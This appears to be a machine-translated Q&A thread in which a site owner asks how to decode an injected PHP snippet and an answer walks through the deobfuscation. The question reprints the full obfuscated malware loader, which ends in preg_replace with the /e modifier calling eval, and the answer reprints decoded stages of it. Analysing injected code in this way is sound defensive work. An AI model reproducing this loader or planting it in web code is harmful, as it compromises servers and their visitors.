deobfuscation — Где взять, чтобы расшифровать скрытый PHP текст с символами в виде строк
Это первый раз, когда я видел инъекцию PHP такого типа.
Обычно я вижу base64 или hex, но это выглядит очень по-разному, заполнено скрытыми строками. Но с каких это пор строки могут содержать такие символы?
Где и как я могу расшифровать этот тип инъекций?
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $rlapmcvoxs = '%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x786jw!>!#]y84]275]y83]248]y83]25786057ftbc%x5c%x787f!|!*uyfu%x5c3]83]238M7]381]211M5]67]452]88]5]48]32M3]31%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]281L1#%x5c%xx7825mm!>!#]y81]273]y76]258]y6g]27>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>>%x5cC)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%x782x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%5c%x7825)fnbozcYufhA%x5c%x78272qj%x5c%x78256<^#zsfvr#%x5c%x78x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%judovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7825c%x7825h>#]y31]278]y3e]81]K78:56985:%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%)Rb%x5c%x7825))!gj!<*#cd2bge56+99386c6f+9f5d816:+94A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x7860{6:!}7;yf%x5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2#*<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppdx7824<!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%x7824<!%x5c%%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x78%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5x5c%x7825%x5c%x7824-%x5c%x7824y4%x5c%x7824s%x5c%x7825<#462]47y]252]18y]#>q%x5c%x7825824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%xx61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%-%x5c%x7824<%x5c%x7825j,,*!|%x5c%x77doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x77825>j%x5c%x7825!<**3-c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%x#~<#%x5c%x782f%x5c%x7825%x5c%x7824-%x5c%x7828786<C%x5c%x7827&6<*rfs%x5cfA>2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x724gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x78255c%x78b%x5c%x7825w:!>!%x5c%x78246767~6]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]y3:]68]y76#<%x5c%x78e%xW#-#C#-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5%x7827k:!ftmf!}Z;^nbsbc%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj<Cw6<pd%x5c%x7825w6Z6<.5%x5c782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P62:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;25nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]3625G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gvodujpo)##-!%x5c%x7878;0]=])0#)U!%x5c%x7827{**u%x5c%x7825j%x5c%x7825-bubE{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj6<*doj%x5c%x78257-e%52%x29%57%x65","%x655c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c%x7825c:>1<usqpt)%x5c%x7825z-#:#*%x5%x5c%x7825)sutcvt)!gFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-#!>!2p%x5c%x7825!|!*!***b]552]e7y]#>n%x5c%x7825<#3725)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UVP?]_%x5c%x785c}X%x5c%x7824<!%x5c%x787fw6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]27c%x7825w6Z6<.2%x5c%x7860hA%x5c%3]78]y33]65]y31]55]y85]82]y76]62]y3:]84#-!5]256]y6g]257]y86]267]y74]27]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x7!|!}{;)gj}l;33bq}k;opjudovg}248L3P6L1M5]D2P4]D6#<%x5c%x78c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+)!gj+{e%x{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqy6]y81]265]y72]254]y76#<%x5c%x7825tmw!>!#]y84]275]y83]273]vg!|!**#j{hnpd#)tutjyf%x5c%x7860opj%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~%%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825cq%x5c%x78257%x5c%x782f7#@#7%x5bz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5MSV,6<*)ujojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#8]322]3]364]6]283]427]36]373P6]36]7_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opc%x7860QUUI&b%x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x58]y3f]51L3]84]y31M6]y3e]81#%x582f#%x5c%x7825#%x5c%x782f#o]#%x6<u%x5c%x78257>%x5c%x782f7&6|7**%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5#%x5c%x782fqp%x5c%x7825>5h%x5c%x7825!<*::::::-111112)eob825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<*#}c%x78e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7dS["%x61%156%x75%156%x61"])))) { $GLOBALS["%x61%15bfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%x782272qj%x5ubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%x5c3]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2!>!bss75]y7:]268]y7f#<!%x5c%x78252]58y]472]37y]672]48y]#>860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%5-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7827gj6<*QDU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fu%163%x74%141%x72%164") && (!isset($GLOBAL825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x5c5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!%x5x5c%x7825>j%x5c%x7825!*3!%x5c%x7860UQPMSVD!-id%x5c%x7825)uqpuft%x5c%x7860msvd},;uqpuft%x5c%x78!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x787825t2w)##Qtjw)#]82#-#!#-%x5c%x7!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5cy33]68]y34]68]y33]65]y31]53]y6d]281]y4-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824A%x5c%x7827pd%x5c%x78256<pd%x5%166%x61%154%x28%151%5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV%x5udovg%x5c%x7822)!gj}1~!<2p%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%x5c%x782c%x7825w%x5c%x7860TW~%x5c%x7c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#-#%x5c%x7824-%x5c%x7824-t04%x5c%x78223}!+!<+{e%x5c%x7825%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%24*<!%x5c%x7824-%x5c%x78x5c%x7825V<*#fopoV;hojepdoF.uofuopD#)sfebfI{*w%c%x782f7^#iubq#%x5c%x785cq%x5c%x7825%x5c6:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x78607825%x5c%x787f!~!<##!>!2p%x5c%x76<&w6<%x5c%x787fw6*CW&)7gj6<.[c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)%x7827pd%x5c%x78256<C%x5c%x7827pd%x5c%x827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@6%x75%156%x61"]=1; function fjfgg($n){%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782c%x7824*!|!%x5c%x7824-%x5c%x7824%825tmw)%x5c%x7825tww**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x5c%x7878B%x5c%x7825tzw>!#]y76]277]y72]265]y39]2c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r%x5c%x7%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x78<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825)kV%x5c%x7878{**#k#)tutj824-%x5c%x7824gvodujpoT#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#25z>!tussfw)%x5c%x7825zW%x5c%x78j!|!*bubE{h%x5c%x7825)j{hnpd!opjudo%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~%x5c%x7825b:>1<!gps)%x5c!gj!|!*msv%x5c%x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j6197g:74985-rr.93e:5597f-s.973:8297f:5297y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y8825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x78g(0); preg_replace("%x2f%50%x2%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*msv%x5c%x7825)}.;%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%x7860opjudovg)fh%x5c%x7825:<**#57]38y]47]OVMM*<%x22%51%x29%51%xc%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h4!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y725):fmji%x5c%x7878:<##:>:h%x5c%x7825:<#64y57**^#zsfvr#%x5c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq3hopmA%x5c%x78273qj%x5c%x78256<*Y%xx7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x787878:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P#-#Q#-#B#-#]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825tdz>#L4]275L3]tn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!%x5c%x782f!#0#)id6]72]y3d]51]y35]274]y4:]82]y3:]62]y4c#<!%x5c%x782c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%*e%x5c%x7827,*d%x5c%x7827,*c%x5c%x7%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#67y]37]88y]27]28y]#%x5c%x782fr%x5c%x7825%x5%x7825s:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>1pde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!-#1]#-bubE{h%x5c%x8984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5cujojRk3%x5c%x7860{666~7878Bsfuvso!sboepn)%x5c%x7825epnbss-x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)p5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%xp!*#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x7%x78257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;uc%x7825Z<#opo#>b%x5c%x7<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5c%x70QUUI7jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x!Ydrr)%x5c%x7825r%x5c%x%x5c%x7825%x5c%x7827Y%x5c%x78256<.msv%x5cq%x5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!s%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x560msvd}+;!>!}%x5c%x7827;!>tpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f2e:4:|:**#ppde#)tutjyf%x5c%x786825)euhA)3of>2bd%x5c%x7825!<5h%x5c%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%xif((function_exists("%x6f%142%x5fx74%162%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%5c%x7825fdy<Cb*[%x5c85c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860h5t::!>!%x5c%x7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%xQIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&ds%x5c%x7860un>qp%x5c%x7825!|Z~!<#29%73", NULL); }825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3>?*2b%x5c%x7825)gpfx7825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~25h>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825c%x782f#7e:55946-tr.984:75983:40%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gps)%x5c%x7return chr(ord($n)-1);} @error_reportintww!>!%x5c%x782400~:<h%x5c25z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x574]y85]273]y6g]273]y76]271]y7dx5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tvctus)%x5c%x7825%x5]252]y74]256]y39]252]y83]273]y72]282#<!%x5c%x7825t5!*9!%x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%x5c%x82f14+9**-)1%x5c%x782f2986+7**^%x5c%x782f%x5c%x7825r%x!%x5c%x782f!**#sfmcnbs+yfeobz+sfwjidsb%x5c%x7860bj+upcox3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x78-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!-#2#%x5c%x75c%x782f*)323zbe!-#jt0*?]+^7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x/(.*)/epreg_replacevomlpkllgd'; $suaguutlel = explode(chr((205-161)),'8687,33,4553,41,4139,49,5768,38,9451,39,6678,30,2432,22,5071,21,341,56,1190,46,8720,58,9871,59,1724,24,1624,38,1871,28,3873,48,8856,69,5041,30,2850,31,5686,38,9299,69,6421,41,3841,32,7994,48,1462,27,8175,46,8533,47,8283,53,2733,67,4488,38,4526,27,4188,64,1831,40,7112,35,397,61,3481,32,5504,40,5197,51,7043,69,8359,41,5370,63,2375,57,303,38,1271,55,4400,47,7147,44,2650,54,2555,44,3576,63,7823,22,5613,30,693,60,4886,69,6708,63,4742,69,8507,26,236,67,6771,66,6486,54,583,59,4717,25,7713,64,5169,28,3438,43,4447,41,9702,60,1326,22,2306,69,2160,46,9148,51,6886,54,2535,20,6281,35,3338,35,5137,32,5581,32,9082,66,3235,46,1489,40,8610,36,10057,49,7948,46,7499,35,5724,44,3968,56,9033,33,2599,25,7534,36,9816,55,7356,53,4252,50,1578,46,642,51,5544,37,8984,49,3921,47,3712,68,8221,23,6351,70,8042,66,74,32,1809,22,8400,52,8108,67,4024,47,3674,38,500,46,1947,70,855,48,8580,30,5339,31,3189,46,8646,41,5092,45,3134,55,7881,67,7673,40,8452,55,7458,41,5457,47,6150,33,753,59,2017,50,3077,28,2261,45,9974,56,3810,31,10030,27,2704,29,5975,36,9560,30,9652,50,45,29,3281,57,6581,43,2923,27,4349,27,9490,26,5806,67,6837,27,7570,43,6011,58,6624,54,7001,42,2624,26,4376,24,1097,42,6105,45,458,42,903,69,202,34,4302,47,3513,63,5873,33,9590,62,5276,63,2510,25,5643,43,1055,42,4993,48,1236,35,6183,22,4811,43,5433,24,1529,49,2206,55,1418,44,6940,61,7409,49,8925,59,4660,57,9199,63,8336,23,7845,36,972,49,6249,32,9262,37,1021,34,1348,70,4854,32,5906,69,546,37,6540,41,2800,50,3780,30,9368,31,7777,46,149,53,1899,48,7305,51,3105,29,2114,46,812,43,8778,20,3373,65,9930,44,2067,47,3639,35,106,43,2950,63,3013,64,9762,54,2454,56,6462,24,6316,35,7613,60,8244,39,8798,58,0,45,9399,52,4594,66,6069,36,9516,44,5248,28,1139,51,7191,54,6205,44,1748,61,4071,68,1662,62,7245,60,4955,38,2881,42,6864,22,9066,16'); $rrzeotjace=substr($rlapmcvoxs,(57647-47541),(32-25)); if (!function_exists('kxwjxmmgrq')) { function kxwjxmmgrq($niphkjlwyz, $mdgpayjksw) { $vkmrvgsktf = NULL; for($ijakfonvzd=0;$ijakfonvzd<(sizeof($niphkjlwyz)/2);$ijakfonvzd++) { $vkmrvgsktf .= substr($mdgpayjksw, $niphkjlwyz[($ijakfonvzd*2)],$niphkjlwyz[($ijakfonvzd*2)+1]); } return $vkmrvgsktf; };} $rzgpabhkfk="\x20\57\x2a\40\x6c\155\x67\141\x71\146\x67\155\x72\151\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x37\55\x32\60\x30\51\x29\54\x20\143\x68\162\x28\50\x34\64\x31\55\x33\64\x39\51\x29\54\x20\153\x78\167\x6a\170\x6d\155\x67\162\x71\50\x24\163\x75\141\x67\165\x75\164\x6c\145\x6c\54\x24\162\x6c\141\x70\155\x63\166\x6f\170\x73\51\x29\51\x3b\40\x2f\52\x20\161\x6f\154\x62\157\x71\170\x67\151\x67\40\x2a\57\x20"; $qenzappyva=substr($rlapmcvoxs,(48535-38422),(59-47)); $qenzappyva($rrzeotjace, $rzgpabhkfk, NULL); $qenzappyva=$rzgpabhkfk; $qenzappyva=(798-677); $rlapmcvoxs=$qenzappyva-1; ?>
Решение
Это не зашифровано, просто запутано. Что касается того, «где и как» начать де-запутывание, я не думаю, что есть какой-то магический метод: точно так же, как алгебра, решайте формулы, где вы знаете входные данные, и используйте эти результаты для решения оставшихся переменных. Повторите до конца.
Например, я начал с этой строки:
$qenzappyva = substr($rlapmcvoxs,(48535-38422),(59-47));
Это сработает (я подставляю имена переменных для ясности):
$function = substr($payload, 10113, 12);
Который просто так случается это (используя $rlapmcvoxs как $payload):
$function = 'preg_replace';
Тот preg_replace это функция, которая запускает весь скрипт; это называется тем, что оказывается фронтом для eval (после еще одного запутывания substr() в $payloadмы видим, что передан шаблон замены /(.*)/e, который использует осуждается Модификатор PREG_REPLACE_CALLBACK):
$rzgpabhkfk="\x20\57\x2a\40\x6c\155\x67\141\x71\146\x67\155\x72\151\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\63\x37\55\x32\60\x30\51\x29\54\x20\143\x68\162\x28\50\x34\64\x31\55\x33\64\x39\51\x29\54\x20\153\x78\167\x6a\170\x6d\155\x67\162\x71\50\x24\163\x75\141\x67\165\x75\164\x6c\145\x6c\54\x24\162\x6c\141\x70\155\x63\166\x6f\170\x73\51\x29\51\x3b\40\x2f\52\x20\161\x6f\154\x62\157\x71\170\x67\151\x67\40\x2a\57\x20";
// This is just more escape sequences in a string, so it's safe to de-escape them; they're inert. The result is (I've already done some variable/function renaming for clarity):
// $rzgpabhkfk = ' /* lmgaqfgmri */ eval(str_replace(chr((237-200)), chr((441-349)), build_payload($offsets_and_lengths,$payload))); /* qolboqxgig */ ';
...
preg_replace('/(.*)/e', $rzgpabhkfk, NULL);
Итак, как вы можете видеть, preg_replace () будет eval () строка, которая в свою очередь сама является eval () в результате build_payload(), build_payload() это то, что я назвал функцию kxwjxmmgrq(): он принимает массив пар смещения строки и длины и строит полезную нагрузку, переставляя этот большой $rlapmcvoxs переменная (та, которая имеет знаки процента и т. д.)
Де-запутывание остальной части сценария — просто больше промывки и повторения решения для следующего шага. Как только вы запустите build_payload()и сделать (запутано) str_replace('%', '\\') before eval () (изменяя эти «%» на «\» — escape-символ, так что вы можете видеть, что eval () будет интерпретировать эти шестнадцатеричные и десятичные числа как нормальные буквы после интерпретации):
if((function_exists("\x6f\142\x5f\163\x74\141\x72\164") && (!isset($GLOBALS["\x61\156\x75\156\x61"])))) { $GLOBALS["\x61\156\x75\156\x61"]=1; function fjfgg($n){return chr(ord($n)-1);} @error_reporting(0); preg_replace("\x2f\50\x2e\52\x29\57\x65","\x65\166\x61\154\x28\151\x6d\160\x6c\157\x64\145\x28\141\x72\162\x61\171\x5f\155\x61\160\x28\42\x66\152\x66\147\x67\42\x2c\163\x74\162\x5f\163\x70\154\x69\164\50\x22\134\x78\62\x35\165\x3a\146\x21\76\x21\50\x5c\x7825\x5c\x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<\x5c\x78e\x5c\x78b\x5c\x7825w:!>!\x5c\x78246767~6<Cw6<pd\x5c\x7825w6Z6<.5\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.4\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.3\x5c\x7860hA\x5c\x7827pd\x5c\x78256<pd\x5c\x7825w6Z6<.2\x5c\x7860hA\x5c\x7827pd\x5c\x78256<C\x5c\x7827pd\x5c\x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf\x5c\x7827*&7-n\x5c\x7825)utjm6<\x5c\x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u\x5c\x78257>\x5c\x782f7&6|7**111127-K)ebfsX\x5c\x7827u\x5c\x7825)7fmji\x5c\x78786<C\x5c\x7827&6<*rfs\x5c\x78257-K)fujs\x5c\x7878X6<#o]o]Y\x5c\x78257;utpI#7>\x5c\x782f7rfs\x5c\x78256<#o]1\x5c\x782f20QUUI7jsv\x5c\x78257UFH#\x5c\x7827rfs\x5c\x78256~6<\x5c\x787fw6<*K)ftpmdXA6|7**197-2qj\x5c\x78257-K)udfoopdXA\x5c\x7822)7gj6<*QDU\x5c\x7860MPT7-NBFSUT\x5c\x7860LDPT7-UFOJ\x5c\x7860GB)fubfsdXA\x5c\x7827K6<\x5c\x787fw6*3qj\x5c\x78257>\x5c\x782272qj\x5c\x7825)7gj6<**2qj\x5c\x7825)hopm3qjA)qj3hopmA\x5c\x78273qj\x5c\x78256<*Y\x5c\x7825)fnbozcYufhA\x5c\x78272qj\x5c\x78256<^#zsfvr#\x5c\x785cq\x5c\x78257\x5c\x782f7#@#7\x5c\x782f7^#iubq#\x5c\x785cq\x5c\x7825\x5c\x7827jsv\x5c\x78256<C>^#zsfvr#\x5c\x785cq\x5c\x78257**^#zsfvr#\x5c\x785cq\x5c\x7825)ufttj\x5c\x7822)gj6<^#Y#\x5c\x785cq\x5c\x7825\x5c\x7827Y\x5c\x78256<.msv\x5c\x7860ftsbqA7>q\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fubfsdXk5\x5c\x7860{66~6<&w6<\x5c\x787fw6*CW&)7gj6<*doj\x5c\x78257-C)fepmqnjA\x5c\x7827&6<.fmjgA\x5c\x7827doj\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#fmjgk4\x5c\x7860{6~6<tfs\x5c\x7825w6<\x5c\x787fw6*CWtfs\x5c\x7825)7gj6<*id\x5c\x7825)ftpmdR6<*id\x5c\x7825)dfyfR\x5c\x7827tfs\x5c\x78256<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv\x5c\x78257-MSV,6<*)ujojR\x5c\x7827id\x5c\x78256<\x5c\x787fw6*\x5c\x787f_*#ujojRk3\x5c\x7860{666~6<&w6<\x5c\x787fw6*CW&)7gj6<.[A\x5c\x7827&6<\x5c\x787fw6*\x5c\x787f_*#[k2\x5c\x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd\x5c\x7860ufh\x5c\x7860fmjg}[;ldpt\x5c\x7825}K;\x5c\x7860ufldpt}X;\x5c\x7860msvd}R;*msv\x5c\x7825)}.;\x5c\x7860UQPMSVD!-id\x5c\x7825)uqpuft\x5c\x7860msvd},;uqpuft\x5c\x7860msvd}+;!>!}\x5c\x7827;!>>>!}_;gvc\x5c\x7825}&;ftmbg}\x5c\x787f;!osvufs}w;*\x5c\x787f!>>\x5c\x7822!pd\x5c\x7825)!gj}Z;h!opjudovg}{;#)tutjyf\x5c\x7860opjudovg)!gj!|!*msv\x5c\x7825)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j\x5c\x7825>j\x5c\x7825!*3!\x5c\x7827!hmg\x5c\x7825!)!gj!<2,*j\x5c\x7825!-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*72!\x5c\x7827!hmg\x5c\x7825)!gj!<2,*j\x5c\x7825-#1]#-bubE{h\x5c\x7825)tpqsut>j\x5c\x7825!*9!\x5c\x7827!hmg\x5c\x7825)!gj!~<ofmy\x5c\x7825,3,j\x5c\x7825>j\x5c\x7825!<**3-j\x5c\x7825-bubE{h\x5c\x7825)sutcvt-#w#)ldbqov>*ofmy\x5c\x7825)utjm!|!*5!\x5c\x7827!hmg\x5c\x7825)!gj!|!*1?hmg\x5c\x7825)!gj!<**2-4-bubE{h\x5c\x7825)sutcvt)esp>hmg\x5c\x7825!<12>j\x5c\x7825!|!*#91y]c9y]g2y]#>>*4-1-bubE{h\x5c\x7825)sutcvt)!gj!|!*bubE{h\x5c\x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf\x5c\x7860opjudovg\x5c\x7822)!gj}1~!<2p\x5c\x7825\x5c\x787f!~!<##!>!2p\x5c\x7825Z<^2\x5c\x785c2b\x5c\x7825!>!2p\x5c\x7825!*3>?*2b\x5c\x7825)gpf{jt)!gj!<*2bd\x5c\x7825-#1GO\x5c\x7822#)fepmqyfA>2b\x5c\x7825!<*qp\x5c\x7825-*.\x5c\x7825)euhA)3of>2bd\x5c\x7825!<5h\x5c\x7825\x5c\x782f#0#\x5c\x782f*#npd\x5c\x782f#)rrd\x5c\x782f#00;quui#>.\x5c\x7825!<***f\x5c\x7827,*e\x5c\x7827,*d\x5c\x7827,*c\x5c\x7827,*b\x5c\x7827)fepdof.)fepdof.\x5c\x782f#@#\x5c\x782fqp\x5c\x7825>5h\x5c\x7825!<*::::::-111112)eobs\x5c\x7860un>qp\x5c\x7825!|Z~!<##!>!2p\x5c\x7825!|!*!***b\x5c\x7825)sf\x5c\x7878pmpusut!-#j0#!\x5c\x782f!**#sfmcnbs+yfeobz+sfwjidsb\x5c\x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!\x5c\x782f!#0#)idubn\x5c\x7860hfsq)!sp